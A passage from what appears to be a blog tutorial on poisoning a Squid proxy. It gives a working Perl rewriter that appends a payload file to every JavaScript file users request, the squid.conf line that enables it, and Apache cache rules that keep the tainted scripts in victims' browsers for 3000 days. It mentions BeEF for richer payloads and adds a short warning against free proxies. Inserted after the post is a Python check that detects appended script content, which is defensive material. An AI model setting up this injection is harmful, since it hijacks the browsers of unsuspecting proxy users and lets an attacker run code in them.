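#!/usr/bin/perl
# Squid URL rewriter: requests for .js files are redirected to a local copy
# that has /etc/squid/payload.js appended; all other URLs pass through.
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
    chomp $_;
    if($_ =~ /(.*\.js)/i)
    {
        $url = $1;
        # fetch the original script, make it readable for Apache, append the payload
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
    }
    else
    {
        print "$_\n";
    }
    $count++;
}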
This script uses wget to retrieve the original JavaScript file of the page the client asked for and appends the code from the /etc/squid/payload.js file to it. The modified file (which now contains our payload) is then sent to the client. You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored.
Step 3: Tell Squid to use the script above
In /etc/squid/squid.conf add:
url_rewrite_program /etc/squid/poison.pl
Step 4: Never let the cache expire
/var/www/tmp/.htaccess
ExpiresActive On
ExpiresDefault "access plus 3000 days"
These lines tell the Apache server to give the files an insanely long expiration (caching) time, so they will stay in the user's browser until they clear their cookies/caches.
One more restart of squid and you're good to go. If you connect to the proxy and surf to any webpage, the page will be displayed as expected but all links will lead to this blog. The sneaky thing about this technique is that even when somebody disconnects from the proxy, the cached js files will most likely still be in their caches.
In my example the payload does nothing too destructive and the user will know pretty fast that something is fishy, but with creative payloads or frameworks like BeEF all sorts of things could be implemented. Tell your friends never to use free proxies because many hosts do things like that.
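A defender's check for the tampering described above, as an added example that is not part of the original post: it compares a script fetched over a trusted connection with the copy received through a proxy, and flags appended content and very long cache lifetimes. The function names, the 365-day threshold and the sample bytes are assumptions constructed for illustration.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

MAX_CACHE_DAYS = 365  # assumed threshold; longer lifetimes are flagged


def cache_days(headers, now):
    """Cache lifetime in days implied by Cache-Control max-age or Expires, else None."""
    for part in headers.get("Cache-Control", "").split(","):
        name, _, value = part.strip().partition("=")
        if name.lower() == "max-age" and value.isdigit():
            return int(value) / 86400
    if "Expires" in headers:
        try:
            delta = parsedate_to_datetime(headers["Expires"]) - now
            return delta.total_seconds() / 86400
        except (TypeError, ValueError):
            return None  # unparseable or timezone-less date
    return None


def inspect_script(reference, received, headers, now):
    """Compare a trusted copy of a script with the copy seen through the proxy."""
    findings = []
    if received != reference:
        if received.startswith(reference):
            # Original content intact, extra bytes after it: the append pattern
            findings.append(("appended", len(received) - len(reference)))
        else:
            findings.append(("modified", None))
    days = cache_days(headers, now)
    if days is not None and days > MAX_CACHE_DAYS:
        findings.append(("long-cache", round(days)))
    return findings


# Constructed sample data (not captured traffic).
NOW = datetime(2024, 1, 1, tzinfo=timezone.utc)
REFERENCE = b"function menu(){return 1;}\n"
RECEIVED = REFERENCE + b"/* injected */ void 0;\n"
HEADERS = {"Cache-Control": "max-age=259200000"}  # 3000 days in seconds

if __name__ == "__main__":
    print(inspect_script(REFERENCE, RECEIVED, HEADERS, NOW))
```

The trusted copy has to come from a path that does not cross the proxy, for example an HTTPS fetch from another network.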
Be safe on the web (but not with free proxies)
Source: https://blog.haschek.at/post/fd9bc